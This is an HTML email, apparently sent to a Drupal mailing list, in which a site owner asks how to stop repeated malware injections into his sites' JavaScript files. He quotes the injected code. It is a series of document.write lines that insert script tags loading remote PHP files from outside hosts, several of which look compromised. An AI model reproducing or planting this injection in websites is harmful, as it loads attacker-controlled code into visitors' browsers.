This is the malware code which <br><br>document.write(&#39;&lt;script src=<a href="http://heightsevents.com/_private/header-1.php">http://heightsevents.com/_private/header-1.php</a> &gt;&lt;\/script&gt;&#39;);<br>document.write(&#39;&lt;script src=<a href="http://heightsevents.com/_private/header-1.php">http://heightsevents.com/_private/header-1.php</a> &gt;&lt;\/script&gt;&#39;);<br>

document.write(&#39;&lt;script src=<a href="http://heightsevents.com/_private/header-1.php">http://heightsevents.com/_private/header-1.php</a> &gt;&lt;\/script&gt;&#39;);<br>document.write(&#39;&lt;script src=<a href="http://heightsevents.com/_private/header-1.php">http://heightsevents.com/_private/header-1.php</a> &gt;&lt;\/script&gt;&#39;);<br>

document.write(&#39;&lt;script src=<a href="http://pause-gallery.freehostia.com/themes/thumbnails.php">http://pause-gallery.freehostia.com/themes/thumbnails.php</a> &gt;&lt;\/script&gt;&#39;);<br>document.write(&#39;&lt;script src=<a href="http://pause-gallery.freehostia.com/themes/thumbnails.php">http://pause-gallery.freehostia.com/themes/thumbnails.php</a> &gt;&lt;\/script&gt;&#39;);<br>

document.write(&#39;&lt;script src=<a href="http://pause-gallery.freehostia.com/themes/thumbnails.php">http://pause-gallery.freehostia.com/themes/thumbnails.php</a> &gt;&lt;\/script&gt;&#39;);<br>document.write(&#39;&lt;script src=<a href="http://pause-gallery.freehostia.com/themes/thumbnails.php">http://pause-gallery.freehostia.com/themes/thumbnails.php</a> &gt;&lt;\/script&gt;&#39;);<br>

document.write(&#39;&lt;script src=<a href="http://emirersoy.com/images/EmirErsoy.php">http://emirersoy.com/images/EmirErsoy.php</a> &gt;&lt;\/script&gt;&#39;);<br>document.write(&#39;&lt;script src=<a href="http://emirersoy.com/images/EmirErsoy.php">http://emirersoy.com/images/EmirErsoy.php</a> &gt;&lt;\/script&gt;&#39;);<br>

document.write(&#39;&lt;script src=<a href="http://emirersoy.com/images/EmirErsoy.php">http://emirersoy.com/images/EmirErsoy.php</a> &gt;&lt;\/script&gt;&#39;);<br>document.write(&#39;&lt;script src=<a href="http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php">http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php</a> &gt;&lt;\/script&gt;&#39;);<br>

document.write(&#39;&lt;script src=<a href="http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php">http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php</a> &gt;&lt;\/script&gt;&#39;);<br>document.write(&#39;&lt;script src=<a href="http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php">http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php</a> &gt;&lt;\/script&gt;&#39;);<br>

document.write(&#39;&lt;script src=<a href="http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php">http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php</a> &gt;&lt;\/script&gt;&#39;);<br>document.write(&#39;&lt;script src=<a href="http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php">http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php</a> &gt;&lt;\/script&gt;&#39;);<br>

document.write(&#39;&lt;script src=<a href="http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php">http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php</a> &gt;&lt;\/script&gt;&#39;);<br>document.write(&#39;&lt;script src=<a href="http://acta-endo.ro/imagini/.img.php">http://acta-endo.ro/imagini/.img.php</a> &gt;&lt;\/script&gt;&#39;);<br>

document.write(&#39;&lt;script src=<a href="http://apsex.ru/java_er/desc/l4n3/8.gif.php">http://apsex.ru/java_er/desc/l4n3/8.gif.php</a> &gt;&lt;\/script&gt;&#39;);<br>document.write(&#39;&lt;script src=<a href="http://apsex.ru/java_er/desc/l4n3/8.gif.php">http://apsex.ru/java_er/desc/l4n3/8.gif.php</a> &gt;&lt;\/script&gt;&#39;);<br>

document.write(&#39;&lt;script src=<a href="http://apsex.ru/java_er/desc/l4n3/8.gif.php">http://apsex.ru/java_er/desc/l4n3/8.gif.php</a> &gt;&lt;\/script&gt;&#39;);<br>document.write(&#39;&lt;script src=<a href="http://apsex.ru/java_er/desc/l4n3/8.gif.php">http://apsex.ru/java_er/desc/l4n3/8.gif.php</a> &gt;&lt;\/script&gt;&#39;);<br>

document.write(&#39;&lt;script src=<a href="http://apsex.ru/java_er/desc/l4n3/8.gif.php">http://apsex.ru/java_er/desc/l4n3/8.gif.php</a> &gt;&lt;\/script&gt;&#39;);<br>document.write(&#39;&lt;script src=<a href="http://jobstt.co.cc/wp-admin/postinblogr.php">http://jobstt.co.cc/wp-admin/postinblogr.php</a> &gt;&lt;\/script&gt;&#39;);<br>

document.write(&#39;&lt;script src=<a href="http://metalfiltre.com/fckeditor/indexz.php">http://metalfiltre.com/fckeditor/indexz.php</a> &gt;&lt;\/script&gt;&#39;);<br><br><br><div class="gmail_quote">On Tue, Apr 20, 2010 at 10:59 AM, sushyl <span dir="ltr">&lt;<a href="mailto:sushyl@gmail.com">sushyl@gmail.com</a>&gt;</span> wrote:<br>

<blockquote class="gmail_quote" style="margin: 0pt 0pt 0pt 0.8ex; border-left: 1px solid rgb(204, 204, 204); padding-left: 1ex;">HI,<br>I am having malware problems with all my drupal sites. A piece of code gets inserted in all or some javascript(.js) files. Its happening even to the files with permissions &quot;644&quot;. I have to remove the code and submit the site  for review on webmaster tools on google, so that mozilla-firefox does not give malware. It takes 2-3 days. This is happening again and again, and i have to repeat same process each time. Is there any permanent solution for this issue?<br>


<br>I am giving the code that gets into the files. Sometimes the links in that code are different.<br><br>Thanks<br><font color="#888888">--<br>Sushil Hanwate<br>
</font></blockquote></div><br><br clear="all"><br>-- <br>Regards<br><br>Sushil Hanwate.<br>